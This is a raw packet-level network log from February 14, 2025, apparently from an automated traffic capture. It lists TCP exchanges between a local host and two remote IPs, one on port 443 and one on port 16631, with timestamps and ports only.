Feb 14, 2025 19:50:16.899523020 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.899529934 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.899569988 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.900573969 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.900639057 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.900646925 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.900793076 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.902786016 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.902837992 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.902851105 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.903053999 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.903745890 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.903805017 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.903810978 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.903858900 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.905265093 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.905333996 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.905344963 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.905514956 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.906774998 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.906877995 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.906891108 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.906945944 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.908294916 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.908365965 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.908415079 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.908473015 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.909821987 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.910010099 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.910032034 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.910114050 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.911328077 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.911387920 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.911398888 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.911497116 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.912725925 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.912800074 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.912846088 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.913018942 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.914205074 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.914258003 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.914287090 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.914293051 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.914366961 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.915636063 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.915730000 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.915739059 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.915832043 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.917057991 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.917109966 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.917118073 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.917161942 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.918343067 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.918431044 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.918442965 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.918559074 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.920208931 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.920262098 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.920274973 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.920324087 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.922431946 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.922471046 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.922538042 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.922538042 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.922554970 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.922624111 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.922624111 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.926960945 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.927015066 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.927026033 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.927078962 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.927122116 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.927211046 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.927238941 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.927264929 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.927287102 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.927325964 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.933561087 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.933618069 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.933643103 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.933645964 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.933656931 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.933753967 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.933753967 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.933804989 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.933845043 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.933855057 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.933864117 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.933901072 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.933928967 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.940093040 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.940150023 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.940165043 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.940171003 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.940207005 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.940227032 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.940231085 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.940284967 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.940382957 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.940437078 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.946475029 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.946600914 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.946609020 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.946638107 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.946646929 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.946652889 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.946703911 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.946724892 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.946738005 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.946966887 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.953411102 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.953466892 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.953494072 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.953556061 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.953556061 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.953556061 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.953569889 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.953707933 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.953741074 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.953749895 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.953767061 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.953798056 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.959100008 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.959140062 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.959166050 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.959175110 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.959197998 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.959232092 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.959409952 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.959445953 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.959462881 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.959467888 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.959542036 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.959542036 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.963656902 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.963717937 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.963741064 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.963782072 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.963787079 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.963820934 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.963850975 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.963851929 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.963864088 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.963875055 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.963917017 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.970021009 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.970143080 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.970151901 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.970194101 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.970205069 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.970248938 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.970480919 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.970524073 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.970527887 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.970535040 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.970557928 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.970592976 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.975121021 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.975178003 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.975208044 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.975239992 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.975239992 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.975258112 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.975275040 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.975305080 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.975425005 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.975506067 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.975512981 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.975568056 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.981761932 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.981848955 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.981856108 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.981899977 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.981906891 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.981965065 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.981978893 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.982048988 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.982212067 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.982255936 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.985912085 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.985949993 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.985976934 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.985985041 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.985996008 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.986066103 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.986157894 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.986224890 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.986234903 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.986284971 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.986422062 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.986485958 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.986495018 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.986608982 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.990739107 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.990786076 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.990818024 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.990845919 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.990871906 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.990896940 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.990904093 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.991012096 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.991085052 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.991132021 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.991179943 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:19.279268026 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:19.287151098 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:19.287600040 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:19.331896067 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:19.337012053 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:19.337703943 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:19.342518091 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:19.940152884 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:19.941096067 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:19.941108942 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:19.941122055 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:19.941133976 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:19.941206932 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:19.941219091 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:19.941230059 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:19.941231966 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:19.941231966 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:19.941242933 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:19.941252947 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:19.941257000 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:19.941288948 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:19.941308022 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:19.946113110 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:19.946125984 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:19.946531057 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.023746967 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.023760080 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.024012089 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.027759075 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.027791023 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.027805090 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.027892113 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.028050900 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.028064013 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.028076887 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.028089046 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.028171062 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.028171062 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.028820038 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.028881073 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.029324055 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.029337883 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.029345989 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.029359102 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.029371977 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.029494047 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.029494047 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.030047894 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.030085087 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.030092001 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.030097008 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.030109882 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.030148029 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.030930042 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.030944109 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.030956030 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.030968904 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.031151056 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.031151056 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.078643084 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.114392996 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.114486933 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.114500046 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.114512920 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.114525080 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.114684105 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.114684105 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.114859104 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.114876986 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.114890099 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.114901066 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.114912987 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.115031958 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.115727901 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.115741968 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.115761995 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.115773916 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.115786076 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.115809917 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.115886927 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.116693974 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.116712093 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.116725922 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.116736889 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.116749048 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.116837978 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.116837978 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.116837978 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.117671013 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.117682934 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.117696047 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.117707968 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.117719889 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.117885113 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.117885113 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.118494987 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.118549109 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.118561029 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.118572950 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.118583918 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.118608952 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.118608952 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.118633032 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.119457006 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.119474888 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.119488001 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.119499922 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.119513035 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.119566917 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.119566917 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.172343969 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.188988924 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.189003944 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.189023018 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.189033985 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.189075947 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.189086914 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.189099073 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.189575911 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.189615011 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.189968109 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.189968109 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.189968109 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.189968109 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.201045036 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.201067924 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.201080084 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.201092005 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.201105118 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.201128960 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.201154947 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.201287031 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.201308966 CET	16631	51534	46.161.0.101	192.168.2.6
